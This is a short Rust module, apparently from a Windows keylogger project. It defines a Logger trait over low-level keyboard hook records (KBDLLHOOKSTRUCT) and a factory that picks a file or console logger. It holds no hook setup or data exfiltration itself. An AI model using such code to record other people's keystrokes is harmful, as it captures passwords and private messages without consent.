use winapi::um::winuser::KBDLLHOOKSTRUCT;
use crate::logger::loggers::{ConsoleLogger, FileLogger};

pub trait Logger: Sync {
    fn log(&self, key: &KBDLLHOOKSTRUCT);
}

pub fn get_logger(name: &str) -> Box<dyn Logger> {
    match name {
        "file" => Box::new(FileLogger::new_default()),
        _ => Box::new(ConsoleLogger),
    }
}
